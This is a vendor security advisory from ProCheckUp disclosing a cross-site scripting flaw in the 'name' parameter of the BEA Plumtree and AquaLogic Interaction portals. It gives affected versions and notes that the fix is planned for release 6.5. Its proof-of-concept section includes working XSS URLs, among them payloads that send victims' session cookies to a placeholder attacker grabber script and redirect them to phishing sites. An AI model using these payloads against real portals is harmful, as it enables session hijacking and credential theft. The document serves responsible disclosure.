New Banner 3

Services

Find out more about ProCheckUp's services including: Penetration Testing, PCI QSA and PCI ASV

PR06-12

PR06-12 - XSS on BEA Plumtree Foundation and AquaLogic Interaction portals

ProCheckUp Labs

ProCheckUp Labs are dedicated to conducting research and raising the awareness of information security issues. The combination of ProCheckNet's response-driven AI technology and our experienced security consultants has led to the discovery of many security vulnerabilities and advisories during penetration testing assignments.

In 2008 ProCheckUp published more vulnerabilities than any other UK penetration testing company.

Over the years, ProCheckUp have been credited with finding vulnerabilities and advisories in products from vendors such as:  

Microsoft - Aruba Networks - IBM - Novell - BEA Systems - Whale Communications - Netscape - Hummingbird - Apache- F5 Networks - GoAhead - Sun Microsystems

Advisories (Vulnerabilities) & Papers

Vulnerability found:
12 September 2006
Vendor informed:
18 May 2007
Severity level:
Medium/High
Credits:
Jan Fry and Adrian Pastor of ProCheckUp Ltd (www.procheckup.com) ProCheckUp thanks BEA Systems for their co-operation.
Description:
BEA Plumtree Foundation portal 6.0 and BEA AquaLogic Interaction 6.1 are vulnerable to a XSS vulnerability affecting the 'name' parameter which is submitted to the '/portal/server.pt' server-side script.

Consequences

Scripting code can be run within the security context of the target site. User accounts can be hijacked. Advanced phishing attacks can be launched.

Note

This vulnerability could be considered a medium-high risk (rather than medium risk) in cases in which admin users are targeted, resulting in the attacker gaining administrative privileges on the target Plumtree/AquaLogic Portal.

Successfully tested on

BEA Plumtree Foundation 6.0.1.218452.

BEA Systems have confirmed the following versions to be affected:

BEA Plumtree Foundation 6.0 through service pack 1.
BEA AquaLogic Interaction 6.1 through service pack 1.

BEA Plumtree 5.0J.173033, 5.02, 5.03 and 5.4 are not affected by this issue.

BID

27893
Proof of concept:
The following requests launches a JavaScript alert box on the user's web browser, simply to prove that is possible to run scripting code on the victim's web browser.

Please note that '%22;}%3C/script%3E' is added at the beginning of every payload in order to make the overall HTML document syntactically correct, thus increasing the chance of the attack working on different web browser types

https://[hostname]/portal/server.pt?open=space&name=</SCRIPT><script>alert('CanCrossSiteScript')</script>

https://[hostname]/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ealert('CanCrossSiteScript')%3C/script%3E%3C!--

The following requests allow session hijacking through cookie theft:

https://[hostname]/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://[attackerssite]/grabber.php?c="%2bdocument.cookie</script>

http://[hostname]/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://[attackerssite]/grabber.php?c="%2bdocument.cookie%3C/script%3E%3C!--

The following requests allow password theft by redirecting to a third-party 'spoof' site which would perform a phishing attack on the victim:

https://[hostname]/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://[phisherssite]"</script>

http://[hostname]/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://[phisherssite]%3C/script%3E%3C!--

HTML injection through this XSS vulnerability is also possible. This allows advanced phishing attacks by inserting a HTML form within the context of the victim website.
How to fix:
this issue will be addressed in the 6.5 release of AquaLogic Interaction.
References:
http://www.procheckup.com/research/views/vulnerabilities

BEA's BEA08-186.00 advisory:
http://dev2dev.bea.com/advisoriesnotifications/
Legal:
Copyright 2007 ProCheckUp Ltd.

All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if the Bulletin is not changed or edited in any way, is attributed to ProCheckUp indicating this web page URL, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. ProCheckUp is not liable for any misuse of this information by any third party. ProCheckUp is not responsible for the content of external Internet sites.

Back to Vulnerabilities List